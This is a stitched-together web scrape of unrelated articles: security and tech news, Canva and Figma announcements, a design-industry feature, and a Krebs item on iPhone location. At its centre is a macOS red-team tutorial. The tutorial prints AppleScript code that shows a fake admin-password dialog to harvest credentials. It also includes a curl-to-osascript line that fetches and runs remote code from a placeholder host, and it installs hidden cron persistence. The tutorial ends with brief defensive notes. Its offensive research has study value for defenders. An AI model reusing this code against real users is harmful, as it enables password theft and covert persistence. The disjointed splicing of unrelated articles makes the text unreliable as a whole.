The Good, the Bad and the Ugly in Cybersecurity – Week 49

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

Strong coordinated action was apparent this week when an international law enforcement operation targeted the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The operation was led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, and resulted in disabling IM-RAT, which had been sold to more than 14,500 buyers and used across 124 countries. This insidious RAT, which could disable anti-virus software, record keystrokes, steal data and passwords, and watch victims through their webcams, was sold for as little as $25 per license. The takedown netted the developer, an IM-RAT employee and 13 of the tool’s most prolific users, spanning the entire globe – Australia, Colombia, Czechia, the Netherlands, Poland, Spain, Sweden and the United Kingdom.

In what might turn out to be the biggest news in cybercrime of 2019, the FBI and US DoJ have named two individuals, Maksim Yakubets and Igor Turashev, as being behind the ‘Evil Corp’ hacking group responsible for distributing the Dridex banking trojan. Authorities have offered an unprecedented US $5m reward for information leading to the arrest of Yakubets, who is also thought to be behind the notorious Zeus banking malware. Yakubets is widely believed to be hiding in Russia, so prospects of an arrest any time soon remain slim.

image of tweet Dridex hacker reward

The Bad

A targeted ransomware attack has hit one of America’s largest data center providers, CyrusOne, with the REvil (Sodinokibi) ransomware. Unlike other ransomware attacks that hit US entities this week – like the very “evil” attack on the Shakespeare Theatre in Madison that forced it to cancel Wednesday night’s performance of Charles Dickens’ “A Christmas Carol” – the CyrusOne attack is more significant because it immediately impacts several downstream entities. The company’s initial assessment found that six MSPs (Managed Service Providers) suffered denial-of-service issues. Attacks that target service providers – often thought to have better security than smaller, less technical companies – are more sophisticated, and in the long run can proliferate and impact many client organizations.

image of cyrusone ransomware attack

The Ugly

This week, Kremlin critic Ben Bradshaw (UK, Labour Party) claimed he was the target of a Russian cyber-attack after receiving a suspicious email from Moscow. According to a news story in the Guardian, the email – supposedly from a Russian whistleblower – contained a number of documents that appeared to be genuine. The files showed how the Kremlin had set up a secret “fake news unit” to suppress negative stories and boost pro-government sentiment in its far east region. The Guardian reported that Bradshaw had sent the documents to “cyber experts” for analysis and that they had confirmed two of the documents carried malicious code. However, subsequent analysis by the UK’s National Cyber Security Centre (NCSC) appears to have failed to find anything malicious.

image of Ben Bradshaw tweet

Bradshaw himself seems to believe the email may have been just the opening shot in an attempt at gaining trust, and that his vigilance may have prevented a subsequent spear-phishing attack. We’d certainly agree with the need for caution when dealing with email attachments, by far the most common vector of malware infections for both individuals and organizations. Whether the British politician was really targeted or not, there’s no doubt that increasing meddling in political affairs through cybercrime is the ugly price of today’s wired world. Those tasked with protecting the integrity of the US 2020 election should be watching closely how the UK 2019 election unfolds.

 


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Canva introduces video editing, has big plans for 2020

Canva, the design company with nearly $250 million in funding, has today announced a variety of new features, including a video editing tool.

The company has also announced Canva Apps, which allows developers and customers alike to build on top of Canva. Dropbox, Google Drive, PhotoMosh and Instagram are already in the Canva Apps suite, with a total of 30 apps available at launch.

The video editing tool allows for easy editing with no previous experience required, and also offers video templates, access to a stock content library with videos, music, etc. and easy-to-use animation tools.

Meanwhile, Canva is taking the approach of winning customers when they’re young, with the launch of Canva for Education. It’s a totally free product that has launched in beta with Australian schools, integrating with GSuite and Google Classroom to allow students to build out projects, and teachers to mark them up and review them.

Canva has also announced the launch of Canva for Desktop.

As design becomes more important to the way every organization functions and operates, one of the only barriers to the growth of the category is the pace at which new designers can emerge and enter the workforce.

Canva has positioned itself as the non-designer’s design tool, making it easy to create something beautiful with little to no design experience. The launch of the video editing tool and Canva for Education strengthen that stance, not only creating more users for the platform itself but fostering an environment for the maturation of new designers to join the ecosystem as a whole.

Alongside the announcement, Canva CEO Melanie Perkins has announced that Canva will join the 1% pledge, dedicating 1% of equity, profit, time and resources to making the world a better place.

Here’s what she had to say about it, in a prepared statement:

Companies have a huge role to play in helping to shape the world we live in and we feel like the 1% Pledge is an incredible program which will help us to use our company’s time, resources, product and equity to do just that. We believe the old adage ‘do no evil’ is no longer enough today and hope to live up to our value to ‘Be a Force for Good’.

Interestingly, Canva’s position at the top of the design funnel hasn’t slowed growth. Indeed, Canva recently launched Canva for Enterprise to let all the folks in the organization outside of the design department step up to bat and create their own decks, presentations, materials, etc., all within the parameters of the design system and brand aesthetic.

A billion designs have been created on Canva in 2019, with 2 billion designs created since the launch of the platform.

macOS Red Team: Calling Apple APIs Without Building Binaries

In the previous post on macOS red teaming, we set out to create a post-exploitation script that could automate searching for privileged apps on a target’s Mac and generate a convincing-looking authorization request dialog box to steal the user’s password. We also want our script to be able to monitor for use of the associated app so that it can trigger the spoofing attempt at an appropriate time to maximize success. In this post, we’ll continue developing our script, explore the wider case for taking an interest in AppleScript from a security angle, and conclude with some notes on mitigation and education.

image of calling apple apis

Last time, we got as far as enumerating any Privileged Helper Tools, finding their parent applications, grabbing the associated icon and producing a reasonably credible-looking dialog box. My incomplete version of the script so far looks something like this:

#######################
-->> IMPORT STATEMENTS
#######################

use AppleScript version "2.4" -- Yosemite (10.10) or later
use scripting additions
use framework "Foundation"

#  classes, constants, and enums used
property NSString : a reference to current application's NSString
property NSFileManager : a reference to current application's NSFileManager
property NSWorkspace : a reference to current application's NSWorkspace

set NSDirectoryEnumerationSkipsHiddenFiles to a reference to 4
set NSFileManager to a reference to current application's NSFileManager
set NSDirectoryEnumerationSkipsPackageDescendants to a reference to 2


#######################
-->> PLAIN TEXT CONSTANTS
#######################

-- we can use some encoding on these plain text strings later if we want to make detection more difficult

set defaultIconName to "AppIcon"
set defaultIconStr to "/System/Library/CoreServices/Software Update.app/Contents/Resources/SoftwareUpdate.icns"
set resourcesFldr to "/Contents/Resources/"
set pht to "/Library/PrivilegedHelperTools"
set iconExt to ".icns"
set makeChanges to " wants to make changes."
set privString to "Enter the Administrator password for "
set allowThis to " to allow this."
set software_update_icon to ""

#######################
-->> GLOBALS & PROPERTIES
#######################
(*
tba
*)

#######################
-->> GENERAL HELPER HANDLERS
#######################

on removeWhiteSpace:aString
	set theString to current application's NSString's stringWithString:aString
	set theWhiteSet to current application's NSCharacterSet's whitespaceAndNewlineCharacterSet()
	set theString to theString's stringByTrimmingCharactersInSet:theWhiteSet
	return theString
end removeWhiteSpace:

on removePunctuation:aString
	set theString to current application's NSString's stringWithString:aString
	set thePuncSet to current application's NSCharacterSet's punctuationCharacterSet()
	set theString to theString's stringByTrimmingCharactersInSet:thePuncSet
	return theString
end removePunctuation:

on getSubstringFromIndex:anIndex ofString:aString
	set s_String to NSString's stringWithString:aString
	return s_String's substringFromIndex:anIndex
end getSubstringFromIndex:ofString:

on getSubstringToIndex:anIndex ofString:aString
	set s_String to NSString's stringWithString:aString
	return s_String's substringToIndex:anIndex
end getSubstringToIndex:ofString:

on getSubstringFromCharacter:char inString:source_string
	set s_String to NSString's stringWithString:source_string
	set find_char to NSString's stringWithString:char
	set rangeOf to s_String's rangeOfString:char
	return s_String's substringFromIndex:(rangeOf's location)
end getSubstringFromCharacter:inString:

on getSubstringToCharacter:char inString:source_string
	set s_String to NSString's stringWithString:source_string
	set find_char to NSString's stringWithString:char
	set rangeOf to s_String's rangeOfString:char
	return s_String's substringToIndex:(rangeOf's location)
end getSubstringToCharacter:inString:

on getOffsetOfLastOccurenceOf:target inString:source
	set astid to AppleScript's text item delimiters
	set AppleScript's text item delimiters to target
	set ro to 0
	try
		set ro to (count source) - (count text item -1 of source)
	on error errMsg number errNum
		display dialog errMsg
	end try
	-- restore the delimiters and return on all paths, not just after an error
	set AppleScript's text item delimiters to astid
	return ro - (length of target) + 1
end getOffsetOfLastOccurenceOf:inString:

on getShortAppName:longAppName
	try
		set longName to NSString's stringWithString:longAppName
		set lastIndex to my getOffsetOfLastOccurenceOf:"." inString:longAppName
		set shorter to my getSubstringToIndex:(lastIndex - 1) ofString:longName
		set shortest to shorter's lastPathComponent()
	on error
		# log "didn't get short name for " & longName
		return longAppName
	end try
	return shortest as text
end getShortAppName:

on enumerateFolderContents:aFolderPath
	set folderItemList to "" as text
	set nsPath to current application's NSString's stringWithString:aFolderPath
	--- Expand Tilde & Symlinks (if any exist) ---
	set nsPath to nsPath's stringByResolvingSymlinksInPath()
	--- Get the NSURL ---
	set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath
	
	set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects()
	set AppleScript's text item delimiters to linefeed
	try
		set folderItemList to ((theURLs's valueForKey:"path") as list) as text
	end try
	return folderItemList
end enumerateFolderContents:

on getIconFor:thePath
	set aPath to NSString's stringWithString:thePath
	set bundlePath to current application's NSBundle's bundleWithPath:thePath
	set theDict to bundlePath's infoDictionary()
	set iconFile to theDict's valueForKeyPath:(NSString's stringWithString:"CFBundleIconFile")
	if (iconFile as text) contains ".icns" then
		set iconFile to iconFile's stringByDeletingPathExtension()
	end if
	return iconFile
end getIconFor:

on getAppForBundleID:anID
	-- 'lsappinfo' is a property expected to hold the relevant shell command; it is defined elsewhere in the full script
	set allApps to paragraphs of (do shell script my lsappinfo)
	repeat with apps in allApps
		if apps contains anID then
			set appStr to (NSString's stringWithString:apps)
			set subst to (my getSubstringFromCharacter:"\"" inString:appStr)
			set subst to (my removeWhiteSpace:subst)
			set subst to (my removePunctuation:subst)
			try
				set bundlePath to (NSWorkspace's sharedWorkspace's absolutePathForAppBundleWithIdentifier:subst)
				if bundlePath is not missing value then
					set o to (my getOffsetOfLastOccurenceOf:"/" inString:(bundlePath as text))
					set appname to (my getSubstringFromIndex:o ofString:bundlePath)
					if appname is not missing value then
						return appname as text
					else
						return bundlePath as text
					end if
				end if
			end try
			return subst as text
		else
			-- do nothing
		end if
	end repeat
end getAppForBundleID:

on getPrivilegedHelperTools()
	return its enumerateFolderContents:(my pht)
end getPrivilegedHelperTools

on getPrivilegedHelperPaths()
	set helpers to paragraphs of its getPrivilegedHelperTools()
	set toolNames to {}
	repeat with n from 1 to count of helpers
		set this_helper to item n of helpers
		-- convert AS text to NSString
		set nsHlpr to (NSString's stringWithString:this_helper)
		-- now we can use NSString API to separate the path components
		set helperName to nsHlpr's lastPathComponent()
		set end of toolNames to {name:helperName as text, path:this_helper}
	end repeat
	return toolNames
end getPrivilegedHelperPaths

set helpers to my getPrivilegedHelperPaths()
set helpers_and_apps to {}
repeat with hlpr in helpers
	set bundleID to missing value
	set idString to missing value
	try
		set this_hlpr to hlpr's path
		set idString to (do shell script "launchctl plist __TEXT,__info_plist " & this_hlpr & " | grep -A1 AuthorizedClients") as text
	end try
	if idString is not missing value then
		set nsIDStr to (NSString's stringWithString:idString)
		set sep to (NSString's stringWithString:"identifier ")
		set components to (nsIDStr's componentsSeparatedByString:sep)
		if (count of components) is 2 then
			set str to item 2 of components
			-- some sanitization:
			set str to (my removeWhiteSpace:str)
			set str to (my removePunctuation:str)
			set str to (str's stringByReplacingOccurrencesOfString:"\"" withString:"")
			set bundleID to (str's componentsSeparatedByString:" ")'s item 1
			set bundlePath to (NSWorkspace's sharedWorkspace's absolutePathForAppBundleWithIdentifier:bundleID)
		end if
		if bundleID is not missing value then
			set end of helpers_and_apps to {parent:bundleID as text, path:bundlePath as text, helperName:hlpr's name as text, helperpath:hlpr's path}
		end if
	end if
end repeat

set helpersCount to count of helpers_and_apps
if helpersCount is greater than 0 then
	# 			-- choose one at random
	set n to (random number from 1 to helpersCount) as integer
	set chosenHelper to item n of helpers_and_apps
	set hlprName to chosenHelper's helperName
	set parentName to chosenHelper's path
	set shortName to my getShortAppName:(parentName as text)
	-- set the default icon in case next command fails
	set my software_update_icon to POSIX file (my defaultIconStr as text)
	-- try to get the current helper apps icon
	try
		set iconName to my getIconFor:parentName
		set my software_update_icon to POSIX file (parentName & my resourcesFldr & (iconName as text) & iconExt)
	end try
	-- let's get the user name from Foundation framework:
	set userName to current application's NSUserName()
	display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title shortName default button "OK" with icon my software_update_icon as «class furl» with hidden answer
end if

Choosing an Execution Method

One of AppleScript’s great strengths is the sheer variety of ways you can execute it. This is a topic I will explore further another time, but for now let’s simply list the options. Aside from running your script in Script Editor – something you’d likely never do other than during development – you can run AppleScript code from Services workflows, Mail rules, Folder Actions, Droplets, and a bunch of third-party utilities to boot. You can export your script as an application directly from Script Editor, complete with its own Resources folder and icon, and you can even codesign it right there, too.

image of export script as app

But perhaps the most versatile – and stealthy – way of all is simply to save your script as plain text with an osascript shebang at the top. That will allow you to call it from the command line, with no pre-compilation necessary at all. Try this simple experiment in your favorite text or code editor:

#!/usr/bin/osascript
use framework "Foundation"
property NSWorkspace : a reference to current application's NSWorkspace
set isFront to NSWorkspace's sharedWorkspace's frontmostApplication's localizedName as text

If your editor has the ability to run code directly (e.g., in BBEdit you can execute the contents of the front window with Command-R), run it now and note the result. Otherwise, save the file and run it from the command line.

image of run in bbedit
Of course, it returns the code editor itself since that is the frontmost app when you execute it. If we save the file as ‘frontmost_app’ without a file extension and run it from the Terminal, no prizes for guessing what’s returned, as the Terminal is now the frontmost app:

image of run in terminal
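If you do take the command-line route, either pass the file to osascript explicitly or rely on the shebang. Both commands below assume the ‘frontmost_app’ filename used above:

```shell
$ osascript frontmost_app
$ chmod +x frontmost_app && ./frontmost_app
```

The second form only works because of the `#!/usr/bin/osascript` line at the top of the file.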
This may seem trivial, but it’s actually quite consequential. Until relatively recently, if you wanted to call Apple’s Carbon or Cocoa APIs on a Mac, you needed to build your code and compile it into a Mach-O binary. Of course, you don’t need a Mach-O if you want to run Bash shell commands, but then you can’t access the powerful Cocoa and Foundation APIs from that kind of shell script either. 

The problem with binaries, though, particularly on Mojave and Catalina, is that they can be scanned for strings and byte sequences, subjected to codesigning and notarization checks, and typically are written to disk where they can be detected by AV suites and other security tools. Wouldn’t it be nice if there was a way of executing native API code without all those security hurdles to get past? Wouldn’t it be nice if we could execute that code in memory?

On that point, the recent discovery of a “fileless” macOS malware that builds and executes a binary in memory using the native NSCreateObjectFileImageFromMemory and NSLinkModule APIs caused a bit of a stir this week, although it’s not the first time this technique has been seen in the wild. With AppleScript/Objective C, however, we can get the power of the Cocoa and Foundation APIs without building a binary at all. And since we can execute scripts containing AppleScript/Objective C from plain, uncompiled text, we can curl out to a remote server to download and then execute our “malicious” AppleScript/Objective C code in memory, too, without ever touching the file system.
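To make that concrete, the kind of one-liner this enables might look like the following. Everything here is illustrative – the URL and filename are placeholders, and passing “-” to tell osascript to read the script from standard input is my assumption about the simplest way to wire this up:

```shell
$ curl -s https://example.com/payload.applescript | osascript -
```

Because the script is plain text piped straight into the interpreter, nothing needs to be compiled or written to disk first.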

At this point, it’s probably worth pointing out that AppleScript isn’t the only way to do this. There is also JavaScript for Automation (JXA), the third-party Python/Objective C bridge (PyObjC), and even Swift can be used as a scripting language. However, to my mind AppleScript/Objective C is more stable and mature than JXA, less obvious than Python and free of external dependencies, while also being substantially easier to develop in than Swift scripts. That doesn’t mean these alternatives aren’t worth our attention another day, though!

But Wait… Why Not Use ‘Vanilla’ AppleScript?

Let’s return to our Proof-of-Concept script that we began in the previous post. Our little NSWorkspace code snippet above will come in handy as one of the tasks we have to implement is watching for the app that we have chosen to spoof becoming active. This will be an ideal time to socially engineer the user and see if we can catch our target off guard and grab their credentials. 

Old school AppleScripters will know that we can use a short snippet of what is sometimes called “vanilla” AppleScript code to tell us which app is “frontmost” without reaching out to Cocoa APIs like NSWorkspace. 

tell application "System Events"
	set frontapp to POSIX path of (file of process 1 whose frontmost is true) as text
end tell

However, vanilla AppleScript is problematic on a few counts. One, AppleScript is much slower than Objective C; two, the System Events app itself is notoriously slow and sometimes buggy; three, on Catalina, Apple have put limits on what you can do with some of the Apple Events generated by AppleScript. As soon as you start trying to control applications with AppleScript you are at risk of triggering a user consent dialog. From WWDC 2019:

“…the user must consent before one app can use AppleScript or raw Apple Events to control the actions of another app. These consent prompts make it clear which apps are acting under the influence of which other apps and give the user control over that automation.”

We can avoid these potentially noisy Apple Events by steering clear of interacting with other apps and utilities with vanilla AppleScript and sticking to a combination of Foundation and Cocoa APIs and calling out to native command line utilities where necessary. 

Finding the Right Time For Social Engineering

Our next obstacle is figuring out how to check for our target app becoming frontmost without our own code getting in the way and becoming frontmost when we execute it. The answer to that problem lies in deciding how we’re going to launch our POC script. 

As we’ve seen, there are many different contexts in which we can launch AppleScript code, but let’s assume here that we will execute our script from a plain-text ASCII file. We can do that in any number of ways: from a parent bash or python script, or directly from osascript. There are also a number of options for watching for the application to come frontmost. Rather than recommend any in particular, I’ll refer you to this post on macOS persistence methods, which explains the various options for launching persistent code. For the sake of this example, I’m going to use a cron job, because cron jobs are quick and easy to write and less visible to most users than, say, LaunchAgents and LaunchDaemons.

We can insert a cron job to the user’s crontab without authorization or authentication. A simple echo will do, though beware that this particular way of doing it will overwrite any existing cron jobs the user may have:

$ echo '*/1    *    *    *    * /tmp/.local' | crontab -

This will cause whatever is located at /tmp/.local to execute once a minute, indefinitely. Of course, we place our POC script at just that location. Let’s expand our earlier snippet and test this mechanism to make sure it returns the application that the user is engaged with rather than our calling code:

image of frontmost app
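For readers who can’t see the screenshot, a minimal reconstruction of that expanded snippet might look like the following. Treat it as a sketch rather than the exact code in the image; the output path ~/front.out is taken from the discussion below:

```applescript
#!/usr/bin/osascript
use framework "Foundation"
property NSWorkspace : a reference to current application's NSWorkspace

-- get the localized name of whatever app is frontmost right now
set isFront to NSWorkspace's sharedWorkspace's frontmostApplication's localizedName as text

-- write it out so we can inspect the result after cron fires
do shell script "echo " & quoted form of isFront & " > ~/front.out"
```

Because cron runs the script as a background process, the frontmost application it reports should be whatever the user is actually working in, not our own code.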

Save this as /tmp/.local and execute the line above to install the crontab. Assuming you have no other cron jobs, you can safely do this on your own machine and remove the crontab later with 

$ crontab -r

Now, you might like to continue browsing for a minute or so before inspecting what’s inside the ~/front.out file. If all’s gone well, it should be the name of your browser, or whatever application you were using when the code triggered. 

The cron job will keep running the script and overwrite the last entry every minute until you either delete the crontab or remove the script at /tmp/.local.
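Incidentally, if you wanted to avoid clobbering any existing cron jobs when installing, a common pattern (my suggestion, not from the original install one-liner) is to append to the current crontab instead:

```shell
$ (crontab -l 2>/dev/null; echo '*/1 * * * * /tmp/.local') | crontab -
```

The `2>/dev/null` suppresses the error `crontab -l` emits when the user has no existing crontab.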

We now have a mechanism for watching for the user’s activity that should not trip any built-in macOS security mechanisms. We can now hook that up to our POC script so that whatever application has been chosen by the script to get spoofed is the one we watch out for.

Let’s add a repeat loop that calls a new handler, checkIfFrontmost:shortName.

image of add handler

You can now create the handler further up the script by adapting the code snippet we tested above to check and return true if the app name is the same as shortName, and false otherwise. Remember that shortName is being passed into the handler as an NSString, so deal with that as described in the previous post.
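Putting those two pieces together, a hedged sketch of the loop and handler might look like this, adapting the NSWorkspace snippet from earlier. The handler body and the one-second polling delay are my choices, not necessarily the post’s:

```applescript
-- poll until the target app comes frontmost, then proceed to the spoofed dialog
repeat
	if (my checkIfFrontmost:shortName) then exit repeat
	delay 1
end repeat

on checkIfFrontmost:shortName
	-- shortName may arrive as an NSString, so coerce both sides to text
	set frontName to NSWorkspace's sharedWorkspace's frontmostApplication's localizedName as text
	return frontName is equal to (shortName as text)
end checkIfFrontmost:
```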

Password Capture and Confirmation

We now have pretty much everything in place: a means of enumerating trusted, authorized helper tools and their parent apps, a convincing dialog box with icon and appropriate title, and a means of determining when the user is engaged with our target app. Let’s add the code for dealing with the dialog box’s “OK” and “Cancel” buttons.

image of capture password

Here we make the request twice, saving each answer in a list called answers. Later, we retrieve the last answer in the list, on the assumption that the user typed more carefully on the second attempt, as users typically believe a failed authorization is due to their own typing error. We also add some logic here in case the user decides to cancel out at any point. In that event, we throw another dialog saying the parent app “can’t continue”, and we then attempt to kill the process by getting its PID from either the app’s path or its bundle identifier. Again, note we could do this directly with vanilla AppleScript just by using a

tell application "BBEdit" to quit

We could also use NSRunningApplication’s terminate API, but at risk of running into macOS security checks, it may be better to shell out and issue a kill command via do shell script. Here’s a quick and dirty handler for grabbing the PID that probably needs a bit more battle-testing.

image of getPidFor handler
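For those following along in text form, a rough equivalent of that handler might look like the sketch below. The use of pgrep is my choice of utility here, and the handler name is taken from the image caption; consider it a starting point rather than the post’s exact code:

```applescript
on getPidFor:appName
	set thePid to ""
	try
		-- pgrep -x matches the process name exactly; the try block
		-- swallows the error pgrep raises when nothing matches
		set thePid to (do shell script "pgrep -x " & quoted form of (appName as text))
	end try
	return thePid
end getPidFor:
```

With the PID in hand, a `do shell script "kill " & thePid` avoids the macOS security checks that interapplication Apple Events can trigger.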

Finally, I leave it as an exercise for the reader to decide how best to write the password out to file. You could use vanilla AppleScript here, since it won’t involve interapplication communication, but there’s a perfectly good (faster, more stable) NSString writeToFile: API that you can use instead. Whichever technique you choose, consider the location carefully in light of Mojave’s and Catalina’s new user privacy restrictions. Our incomplete POC script will also require some further logic to stop the spoofing (remember, that cron job is still firing!) once we’ve successfully captured the password.
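As one possible starting point, a hedged sketch of the NSString approach might look like this. The output path is purely illustrative (chosen because /Users/Shared is not subject to the newer user-privacy protections), and the answers list is the one built up in the dialog-handling code above:

```applescript
-- write out the last (presumably most carefully typed) answer; path is illustrative
set nsAnswer to (NSString's stringWithString:(item -1 of answers))
nsAnswer's writeToFile:"/Users/Shared/.cache" atomically:true encoding:(current application's NSUTF8StringEncoding) |error|:(missing value)
```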

Blue Teams and Mitigation Strategies

In this post and the previous post, I’ve tried to show how AppleScript can be leveraged as a “living off the land” utility in the hope of drawing attention to just how powerful this underused and underrated macOS technology really is.

While I find it unlikely that threat actors would use these techniques in the wild – in part because threat actors already have well-established techniques for acquiring privileges – I believe it is important that, as security researchers, we turn over every stone, look into every possibility and ask questions like “what if someone did this?”, “how would we detect it?” and “what should we do to prevent it?” I believe the onus is on us to know at least as much as our adversaries about how macOS technologies work and what can be done with them.

On top of that, the ease (after a little practice!) with which sophisticated and powerful AppleScript/Objective C scripts can be built, modified and deployed can provide another useful tool for red teams looking for unexpected payoffs in their engagements.

For mitigation strategies, aside from running demos of this kind of spoofing activity to educate users, defenders should look out for osascript in the process list. There aren’t many legitimate uses of osascript in organizations, and those there are should be easy to enumerate and monitor. AppleScript is very much “the PowerShell of macOS”, only with much more power and much less scrutiny from the security community. Let’s make sure we, as defenders, know more about it than those with malicious intent.



Design may be the next entrepreneurial gold rush

Ten years ago, the vast majority of designers were working in Adobe Photoshop, a powerful tool with fine-tuned controls for almost every kind of image manipulation one could imagine. But it was a tool built for an analog world focused on photos, flyers and print magazines; there were no collaborative features, and much more importantly for designers, there were no other options.

Since then, a handful of major players have stepped up to dominate the market alongside the behemoth, including InVision, Sketch, Figma and Canva.

And with the shift in the way designers fit into organizations and the way design fits into business overall, the design ecosystem is following the same path blazed by enterprise SaaS companies in recent years. Undoubtedly, investors are ready to place their bets in design.

But the question still remains over whether the design industry will follow in the footprints of the sales stack — with Salesforce reigning as king and hundreds of much smaller startup subjects serving at its pleasure — or if it will go the way of the marketing stack, where a lively ecosystem of smaller niche players exist under the umbrella of a handful of major, general-use players.

“Deca-billion-dollar SaaS categories aren’t born every day,” said InVision CEO Clark Valberg. “From my perspective, the majority of investors are still trying to understand the ontology of the space, while remaining sufficiently aware of its current and future economic impact so as to eagerly secure their foothold. The space is new and important enough to create gold-rush momentum, but evolving at a speed to produce the illusion of micro-categorization, which, in many cases, will ultimately fail to pass the test of time and avoid inevitable consolidation.”

I spoke to several notable players in the design space — Sketch CEO Pieter Omvlee, InVision CEO Clark Valberg, Figma CEO Dylan Field, Adobe Product Director Mark Webster, InVision VP and former VP of Design at Twitter Mike Davidson, Sequoia General Partner Andrew Reed and FirstMark Capital General Partner Amish Jani — and asked them what the fierce competition means for the future of the ecosystem.

But let’s first back up.

Past

Sketch launched in 2010, offering the first viable alternative to Photoshop. Made for design rather than photo editing, with a specific focus on UI and UX, Sketch arrived just as the app craze was picking up serious steam.

A year later, InVision landed in the mix. Rather than focus on the tools designers used, it concentrated on the evolution of design within organizations. With designers consolidating from many specialties to overarching positions like product and user experience designers, and with the screen becoming a primary point of contact between every company and its customers, InVision filled the gap of collaboration with its focus on prototypes.

If designs could look and feel like the real thing — without the resources spent by engineering — to allow executives, product leads and others to weigh in, the time it takes to bring a product to market could be cut significantly, and InVision capitalized on this new efficiency.

In 2012 came Canva, a product focused primarily on non-designers and folks who need to ‘design’ without all the bells and whistles professionals use. The thesis: no matter which department you work in, you still need design, whether it’s for an internal meeting, an external sales deck, or simply a side project you’re working on in your personal time. Canva, like many tech firms these days, has taken its top-of-funnel approach to the enterprise, giving businesses an opportunity to unify non-designers within the org around their various decks and materials.

In 2016, the industry felt two more big shifts. In the first, Adobe woke up, realized it still had to compete and launched Adobe XD, which allowed designers to collaborate amongst themselves and within the organization, not unlike InVision, complete with prototyping capabilities. The second shift was the introduction of a little company called Figma.

Where Sketch innovated on price, focus and usability, and where InVision helped evolve design’s position within an organization, Figma changed the game with straight-up technology. If GitHub is Google Drive, Figma is Google Docs. Not only does Figma allow organizations to store and share design files, it actually allows multiple designers to work in the same file at one time. Oh, and it’s all on the web.

In 2018, InVision started to move upstream with the launch of Studio, a design tool meant to take on the likes of Adobe and Sketch and, yes, Figma.

Present

When it comes to design tools in 2019, we have an embarrassment of riches, but the success of these players can’t be fully credited to the products themselves.

A shift in the way businesses think about digital presence has been underway since the early 2000s. In the not-too-distant past, not every company had a website and many that did offered a very basic site without much utility.

In short, designers were needed and valued at digital-first businesses and consumer-facing companies moving toward e-commerce, but very early-stage digital products and incumbents in traditional industries had a free pass to focus on issues other than design. Remember the original MySpace? Here’s what Amazon looked like when it launched.

In the not-too-distant past, the aesthetic bar for internet design was very, very low. That’s no longer the case.

Figma launches Auto Layout

Figma, the design tool maker that has raised nearly $83 million from investors such as Index Ventures, Sequoia, Greylock and Kleiner Perkins, has today announced a new feature called Auto Layout that takes some of the tedious reformatting out of the design process.

Designers are all too familiar with the problem of manually sizing content in new components. For example, when a designer creates a new button for a web page, the text within the button has to be manually sized to fit. If the text or the size of the button changes, everything has to be adjusted accordingly.

This problem is exacerbated when there are many instances of a certain component, all of which have to be manually adjusted.

Auto Layout functions as a toggle. When it’s on, Figma does all the adjusting for designers, making sure content is centered within components and that the components themselves adjust to fit any new content that might be added. When an item within a frame is re-sized or changed, the content around it dynamically adjusts along with it.

Auto Layout also allows users to change the orientation of a list of items from vertical to horizontal and back again, adjust the individual sizing of a component within a list or re-order components in a list with a single click.
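Conceptually, Auto Layout works like constraint-based sizing familiar from CSS flexbox: the container derives its size from its content plus padding and spacing, so resizing a child resizes the frame automatically. Here is a toy sketch of that idea in Python; it is an illustration of the concept only, not Figma's actual implementation.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class Frame:
    """A toy auto-layout frame whose size is derived from its children."""
    padding: int = 8
    spacing: int = 4
    horizontal: bool = True  # orientation toggle, like Auto Layout's
    children: List[Tuple[int, int]] = field(default_factory=list)  # (w, h)

    def size(self) -> Tuple[int, int]:
        if not self.children:
            return (2 * self.padding, 2 * self.padding)
        widths = [w for w, _ in self.children]
        heights = [h for _, h in self.children]
        gap = self.spacing * (len(self.children) - 1)
        if self.horizontal:  # items laid out in a row
            return (sum(widths) + gap + 2 * self.padding,
                    max(heights) + 2 * self.padding)
        # vertical orientation: items stacked in a column
        return (max(widths) + 2 * self.padding,
                sum(heights) + gap + 2 * self.padding)

# A "button" whose frame grows automatically when its label gets longer:
button = Frame(children=[(40, 12)])   # short label
print(button.size())                  # (56, 28)
button.children = [(72, 12)]          # longer label: no manual resize needed
print(button.size())                  # (88, 28)
```

Flipping `horizontal` mirrors Auto Layout's one-click switch between vertical and horizontal lists described above.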

It’s a little like designing on auto-pilot.

Auto Layout also functions within the component system, allowing designers to tweak the source of truth without detaching the symbol or content from it, meaning that these changes flow through to the rest of their designs.

Figma CEO Dylan Field said there was very high demand for this feature from customers, and hopes that this will allow design teams to move much faster when it comes to user testing and iterative design.

Alongside the launch, Figma is also announcing that it has brought on its first independent board member. Lynn Vojvodich joins Danny Rimer, John Lilly, Mamoon Hamid and Andrew Reed on the Figma board.

Vojvodich has a wealth of experience as an operator in the tech industry, having served as EVP and CMO at Salesforce.com. She was a partner at Andreessen Horowitz and led her own company, Take3, for 10 years. Vojvodich also serves on the boards of several large corporations, including Ford Motor Company, Looker and Dell.

“I’ve never brought on an investor that I haven’t heavily reference checked, both with companies that have had success and those that haven’t,” said Field. “A good board can really help accelerate the company, but a challenging board can make it tough for companies to keep moving.”

Field added that, as conversations progressed with Vojvodich, she continually delivered value to the team with crisp answers and great insights, noting that her experience translates.

Apple Explains Mysterious iPhone 11 Location Requests

KrebsOnSecurity ran a story this week that puzzled over Apple‘s response to inquiries about a potential privacy leak in its new iPhone 11 line, in which the devices appear to intermittently seek the user’s location even when all applications and system services are individually set never to request this data. Today, Apple disclosed that this behavior is tied to the inclusion of a short-range technology that lets iPhone 11 users share files locally with other nearby phones that support this feature, and that a future version of its mobile operating system will allow users to disable it.

I published Tuesday’s story mainly because Apple’s initial and somewhat dismissive response — that this was expected behavior and not a bug — was at odds with its own privacy policy and with its recent commercials stating that customers should be in full control over what they share via their phones and what their phones share about them.

But in a statement provided today, Apple said the location beaconing I documented in a video was related to Ultra Wideband technology that “provides spatial awareness allowing iPhone to understand its position relative to other Ultra Wideband enabled devices (i.e. all new iPhone 11s, including the Pro and Pro Max).”

Ultra-wideband (a.k.a. UWB) is a radio technology that uses very low energy levels for short-range, high-bandwidth communications over a large portion of the radio spectrum without interfering with more conventional transmissions.

